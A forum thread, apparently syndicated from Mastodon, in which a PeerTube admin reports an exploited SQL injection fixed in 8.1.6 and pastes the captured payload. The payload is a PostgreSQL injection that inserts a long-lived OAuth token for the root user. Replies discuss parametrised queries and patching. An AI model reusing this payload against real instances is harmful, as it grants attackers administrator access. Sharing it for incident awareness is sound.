<![CDATA[Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6.]]>Today's fun adventure with involves the fixed in 8.1.6. This one has an SQL injection hole. Looks like they got into mine, but apparently nothing was done to it yet. If you're curious, here's what the exploit pushed in the actor table:

Xhttp://20.240.202.159:8777/x');DO//$f$//DECLARE//uid//INT;//cid//INT;//BEGIN//EXECUTE//'SELECT//id//FROM//'||quote_ident('user')||'//WHERE//role=0//LIMIT//1'//INTO//uid;//EXECUTE//'SELECT//id//FROM//'||quote_ident('oAuthClient')||'//LIMIT//1'//INTO//cid;//EXECUTE//'INSERT//INTO//'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_ident('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||quote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('updatedAt')||')//VALUES('||quote_literal('pt_audit_3e8b97f2a914')||','||quote_literal('refresh_pt_audit_3e8b97f2a914')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())';//END//$f$;--

So this worked because they had a ' after the URL.

]]>https://board.circlewithadot.net/topic/c382fb08-35ee-4c0f-9a4f-9f918dea1269/today-s-fun-adventure-with-peertube-involves-the-exploit-fixed-in-8.1.6.RSS for NodeMon, 25 May 2026 06:31:03 GMTSat, 23 May 2026 09:54:12 GMT60<![CDATA[Reply to Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 19:43:34 GMT]]>Looking at my Peertube instances logs, there's A LOT of old versions out there. I think a log of instances seem to be install and forget when it comes to maintenance.

]]>https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116625599008094562https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116625599008094562Sat, 23 May 2026 19:43:34 GMT<![CDATA[Reply to Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 19:07:29 GMT]]>@ghard Back like in early 00s I made my own. Very ghetto, but does everything I want it to do.

"Spaghetti code!" they said.

"It's not modern!"

Well, the patching day for it isn't every day.

]]>https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116625457100246112https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116625457100246112Sat, 23 May 2026 19:07:29 GMT<![CDATA[Reply to Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 11:16:08 GMT]]>@apz LOL very timely, just on that note, say hello to CVE-2026-9082
Not that I would trust Drupal or any other modern or ancient CMS any longer than I could throw it.

]]>https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623603668336757https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623603668336757Sat, 23 May 2026 11:16:08 GMT<![CDATA[Reply to Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 10:58:02 GMT]]>@apz sigh yeah.
I spent a few decades in the industry actually implementing relational database engines, and being at clients' premises with their "expert developers" and seeing them draw a blank when mentioning SQLPrepareStmt or similar...
I don't even want to go there anymore. Now with the AI deskilling I'm expecting things to become even worse.
Glad I dropped out and got to doing something more meaningful.

]]>https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623532543733847https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623532543733847Sat, 23 May 2026 10:58:02 GMT<![CDATA[Reply to Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 10:51:10 GMT]]>@ghard I think the battle trying to explain new developers the concept is already lost. I've explained the problem to couple of project owners and people just don't seem to take it seriously. It's not like it's one of the most basic exploits, ever on the web.

]]>https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116623505542234264https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116623505542234264Sat, 23 May 2026 10:51:10 GMT<![CDATA[Reply to Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 10:44:15 GMT]]>@apz It’s not like RDBMS didn’t have parametrised queries since, like, the dawn of time 🙄

]]>https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623478327575108https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623478327575108Sat, 23 May 2026 10:44:15 GMT<![CDATA[Reply to Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 10:02:02 GMT]]>Apparently this was contained, the forementioned exploit to push the root auth tokens was the only thing. Apparently exploited instances get a plugin called peertube-plugin-google-analytics-js added to do something more or less funny, mine had nothing extra on it for now. Naturally all the passwords are now changed and everyone kicked out.

The 8.1.8 release adds a feature to limit root user's usefulness in an attack like this.

]]>https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116623312350809194https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116623312350809194Sat, 23 May 2026 10:02:02 GMT